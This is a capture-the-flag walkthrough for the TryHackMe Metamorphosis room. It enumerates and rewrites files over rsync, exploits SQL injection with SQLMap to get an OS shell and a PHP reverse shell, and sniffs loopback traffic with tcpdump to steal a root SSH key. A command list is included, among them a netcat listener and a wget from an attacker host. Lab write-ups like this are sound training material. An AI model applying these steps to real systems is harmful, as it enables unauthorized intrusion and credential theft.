Introduction
In this walkthrough, we covered enumerating Rsync and performed packet sniffing with Tcpdump to extract relevant information as part of Incognito CTF Metamorphosis TryHackMe.
Initial Reconnaissance
My first step was to run an Nmap scan to see what services were running on the machine. The scan revealed several open ports, including SSH (22), HTTP (80), SMB (139 and 445), and most interestingly, rsync (873). The rsync service immediately caught my eye as a potential entry point.
Next, I turned my attention to the web server on port 80. It was just a default Apache page, so I fired up Gobuster to look for hidden directories. Gobuster found /index.php
and /admin
, but trying to access /admin
gave me a “403 Forbidden” error. Looking at the page’s source code, I found a clue: the admin functionality was only available in a “development environment.” This told me I needed to find and modify a configuration file, likely a web.ini
file, to switch the environment from “production” to “development.”
Exploiting Rsync
With the web server at a temporary dead end, I went back to the rsync service. I used an Nmap script to list the available rsync modules and found one named “conf.” I then used the rsync
command to list the contents of this “conf” module, which revealed several configuration files, including mysql.ini
and, just as I suspected, web.ini
.
I downloaded these files to my machine and, upon inspecting web.ini
, I found a set of hardcoded credentials: username “tom” and password “cat.” I also saw the environment
variable was set to “production.” I changed this to “development” and then used rsync to upload the modified web.ini
file back to the target machine.
SQL Injection and a Reverse Shell
With the environment now set to “development,” I was able to access the /admin
page. The page had an input field to get user information. I fired up Burp Suite to intercept the request and then used SQLMap to test for SQL injection vulnerabilities on the username
parameter. SQLMap quickly found a vulnerability and even gave me an OS shell!
From there, I tried a few different reverse shell one-liners and successfully got a connection back to my machine using a PHP reverse shell. I now had a shell as the www-data
user.
Privilege Escalation
To escalate my privileges, I downloaded and ran pspy, a tool that monitors running processes. Pspy revealed a recurring curl
process running as root. This process was accessing a local port (1027) and passing a parameter. This looked like a promising vector for privilege escalation.
Since the curl
process was accessing a local port, I used tcpdump on the target machine to sniff the traffic on the loopback interface and saved it to a pcap file. I then transferred this file back to my machine and opened it in Wireshark. Analyzing the captured traffic, I found an SSH private key within the HTTP response of the curl
request.
Getting Root
I saved the SSH private key to a file, gave it the correct permissions, and then used it to SSH into the machine as the root user. Success! I had full root access. From there, it was a simple matter of finding the root flag in /root/root.txt
and the user flag in /home/user/user.txt
.
Technical Commands
Here are some of the key commands I used during this engagement:
- Gobuster for directory enumeration:
sudo go buster dash u [IP_ADDRESS] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
- Nmap Scripting Engine for rsync enumeration:
ls -la /usr/share/nmap/scripts | grep rsync
sudo nmap --script rsync-list-modules -p 873 [IP_ADDRESS]
- Rsync for listing and downloading files:
rsync rsync://[IP_ADDRESS]/conf
mkdir rsync
rsync -av rsync://[IP_ADDRESS]/conf ./rsync
- Rsync for uploading files:
rsync -av web.ini rsync://[IP_ADDRESS]/conf/web.ini
- SQLMap for SQL injection:
sqlmap -r request --dbs --level 5 --risk 3 --os-shell
- Netcat listener:
nc -lvp 4545
- Python HTTP server:
python3 -m http.server
- Wget for downloading files:
wget http://[ATTACKER_IP]:8000/pspy64s
- Changing file permissions:
chmod +x pspy64s
- Running pspy:
./pspy64s
- Tcpdump for sniffing traffic:
sudo tcpdump -i lo -w curl.pcapp
- Moving files:
mv curl.pcapp /var/www/html
- SSH with private key:
chmod 600 id_rsa
ssh -i id_rsa root@[IP_ADDRESS]
- Listing and reading flags:
ls
cat root.txt
cat user.txt
Metamorphosis TryHackMe Room Answers
root.txt